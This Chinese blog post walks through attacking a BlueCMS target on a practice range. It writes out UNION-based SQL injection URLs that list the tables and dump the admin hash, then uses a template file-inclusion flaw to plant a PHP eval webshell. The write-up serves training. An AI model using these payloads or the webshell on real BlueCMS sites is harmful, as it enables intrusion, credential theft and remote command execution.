zoukankan      html  css  js  c++  java
  • 封神台靶场:萌新也能找CMS突破

    靶场地址

    http://59.63.200.79:8003/bluecms/uploads/

     百度查询了bluecms的相关漏洞

    发现存在sql注入,且sql注入点在如下网页

    http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1

    经过探测,发现字段数是7个

    http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()

     发现是可以爆出数据库相关信息的

    爆表名

    ?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+


    document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");

    根据上面爆出来的数据,我发现有两个敏感的表名,blue_admin,blue_admin_log

    爆字段

    但是我这里遇到了问题

    ?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_admin')--+

    初步判断是因为转义的原因,看到 反斜杠,突然感觉有点像宽字节注入。

    但错误并没有解决,我去掉单引号后,识别出来的是这样的

    table_name=遙lue_admin�

    这导致sql语句不正常。

    我想到用编码的方式试一下。

    ?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e)--+
    
    
    document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");

    页面无报错,爆出字段

    爆数据

    ?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(admin_name,0x7e,pwd,0x7e) from blue_admin)--+


    document.write("admin~21232f297a57a5a743894a0e4a801fc3~");

     扫描后台

    登录

    http://59.63.200.79:8003/bluecms/uploads/admin

     登录之后,点点点---->发现

    可能存在上传漏洞

     看到这里,是不是有小伙伴想到了上传文件获取shell。

      我试了,但是没有成功。

      但你们可以试一试。

    又继续东点点、西点点

    又有新发现

    文件包含漏洞

    不同浏览器F12显示的位置不一样---------上图是火狐浏览器,下图为谷歌浏览器。

    利用步骤

    右键---->编辑

     

     打开一个新标签

    复制刚刚的网址把  tpl_name  参数进行修改为你想要修改的php文件

    这个php文件来源我在下面进行讲解

     

     php文件来源讲解

     

     修改php代码,加入一句话木马

    @eval($_REQUEST['cmd']);

    获得getshell

    使用蚁剑连接,连接失败,我有点慌了,我又打开了菜刀。连接上了,获得了getshell

     

     

  • 相关阅读:
    window.location.href的使用方法
    hdu 2850 Load Balancing (优先队列 + 贪心)
    几种常见模式识别算法整理和总结
    【DateStructure】 Charnming usages of Map collection in Java
    编写你自己的单点登录(SSO)服务
    微软历史最高市值是多少?
    Tomcat配置一个ip绑定多个域名
    递归算法:求序列的全排列
    SMTP协议分析
    platform_device与platform_driver
  • 原文地址:https://www.cnblogs.com/Xshun-z/p/14001289.html
Copyright © 2011-2022 走看看